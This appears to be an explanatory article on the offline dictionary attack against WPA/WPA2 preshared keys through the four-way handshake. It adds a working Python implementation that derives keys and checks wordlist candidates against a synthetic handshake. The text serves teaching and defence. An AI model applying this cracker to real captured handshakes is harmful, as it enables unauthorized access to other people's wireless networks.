Attacks on Wireless Gateways - Security IEEE - Wireless Security
Sep 13


On November 4, 2003, Robert Moskowitz pointed out that WPA and 802.11i are open to an offline dictionary attack. This is only true when preshared keys (WPA-PSK) are in use; networks that obtain the master key through 802.1X/EAP authentication are not affected. The weakness comes from the exchange used to create session keys in WPA and 802.11i, the four-way handshake. The handshake derives the Pairwise Transient Key (PTK) from the Pairwise Master Key (PMK), the two nonces exchanged in the handshake, and the MAC addresses of both the authenticator and the supplicant. When preshared keys are used, the PMK itself is derived from the passphrase, the SSID, and the SSID length: these are fed into PBKDF2 (HMAC-SHA1, 4096 iterations), producing a 256-bit key. To repeat this computation, an attacker needs the SSID, its length, and the passphrase. Of these, the passphrase is the only item that is truly confidential: the SSID, and therefore its length, is trivially captured by wireless sniffing software. With that information, an offline dictionary attack against the passphrase is possible.

To perform this attack, the SSID must first be identified, with a wireless sniffer or by other means. The attacker then has to observe the four-way handshake used to create the session keys. The first message, an EAPOL-Key frame from the access point, carries the authenticator's nonce (ANonce). The second message, sent by the client, is another EAPOL-Key frame carrying the supplicant's nonce (SNonce) together with a Message Integrity Code (MIC) computed over that frame. The MIC is keyed with the Key Confirmation Key (KCK), the first 128 bits of the PTK, using HMAC-MD5 for TKIP or HMAC-SHA1 (truncated to 128 bits) for CCMP. Since both nonces, both MAC addresses, and the MIC are all visible on the air, the attacker can take each candidate passphrase, derive the PMK, then the PTK and KCK, recompute the MIC over the captured frame, and compare it with the one observed. A match reveals the passphrase, and none of this requires further contact with the network. The cost of the attack is dominated by the 4096 PBKDF2 iterations per candidate, so it is practical only against passphrases that appear in a wordlist; a long, random preshared key is not recovered this way.
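The derivation chain and the offline check described above, as an added example that is not code from the original article. It follows the public 802.11i/WPA definitions (PBKDF2-HMAC-SHA1 with 4096 rounds for the PMK, PRF-512 for the PTK, the EAPOL-Key MIC keyed with the KCK) and is checked against the passphrase "password"/SSID "IEEE" test vector from the standard. The "captured" handshake, the MAC addresses, nonces, SSID and wordlist are all constructed in the script with a known passphrase so that it runs offline; the function and variable names are this example's own.

```python
import hashlib
import hmac

# Added example, not code from the original article. Follows the public
# 802.11i-2004 / WPA definitions. The "captured" handshake below is
# constructed in this file with a known passphrase so it runs offline.

PRF_LABEL = b"Pairwise key expansion"
# EAPOL header (4 bytes) + descriptor type, key info, key length, replay
# counter, nonce, IV, RSC, ID (1+2+2+8+32+16+8+8 = 77 bytes) precede the MIC.
NONCE_OFFSET = 17
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1 over the passphrase, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, PRF_LABEL, data)


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1 cut to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def descriptor_version(frame: bytes) -> int:
    """Low three bits of the 2-byte Key Information field select the MIC algorithm."""
    return frame[6] & 0x07


def nonce_of(frame: bytes) -> bytes:
    return frame[NONCE_OFFSET:NONCE_OFFSET + 32]


def recover_passphrase(candidates, ssid, aa, spa, msg1, msg2):
    """Offline dictionary attack: rebuild PMK -> PTK -> KCK per candidate and compare MICs."""
    anonce, snonce = nonce_of(msg1), nonce_of(msg2)
    version = descriptor_version(msg2)
    observed_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in candidates:
        pmk = derive_pmk(candidate, ssid)            # the expensive step: 4096 HMAC rounds
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, version), observed_mic):
            return candidate
    return None


def build_eapol_key(key_info: int, replay_counter: int, nonce: bytes, key_data: bytes) -> bytes:
    """Assemble an RSN EAPOL-Key frame (descriptor type 2) with a zeroed MIC."""
    body = (
        b"\x02"                              # descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (0).to_bytes(2, "big")             # key length
        + replay_counter.to_bytes(8, "big")
        + nonce
        + b"\x00" * 16                       # key IV
        + b"\x00" * 8                        # key RSC
        + b"\x00" * 8                        # key ID (reserved)
        + b"\x00" * 16                       # MIC, filled in later
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 1, type Key


def constructed_handshake(passphrase: str, ssid: bytes):
    """Synthetic (not sniffed) WPA2-PSK handshake: message 1 and a message 2 whose MIC was
    computed with the KCK for the given passphrase. MACs and nonces are made-up fixed values."""
    aa = bytes.fromhex("001122334455")                    # authenticator (AP) MAC, made up
    spa = bytes.fromhex("66778899aabb")                   # supplicant (client) MAC, made up
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN IE
    msg1 = build_eapol_key(0x008A, 1, anonce, b"")        # version 2, pairwise, ACK
    msg2 = build_eapol_key(0x010A, 1, snonce, rsn_ie)     # version 2, pairwise, MIC
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2, 2) + msg2[MIC_OFFSET + 16:]
    return aa, spa, msg1, msg2


if __name__ == "__main__":
    ssid = b"CorpWiFi"                                    # made-up SSID
    aa, spa, msg1, msg2 = constructed_handshake("correct horse battery", ssid)
    wordlist = ["password", "letmein", "correct horse battery", "Tr0ub4dor&3"]
    print(recover_passphrase(wordlist, ssid, aa, spa, msg1, msg2))
```

Only messages 1 and 2 are needed: they supply both nonces and a MIC, and everything else that goes into the PTK is in the frame headers. The loop spends almost all of its time in `derive_pmk`, which is exactly the 4096-round cost that bounds how many candidates per second an attacker can try.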
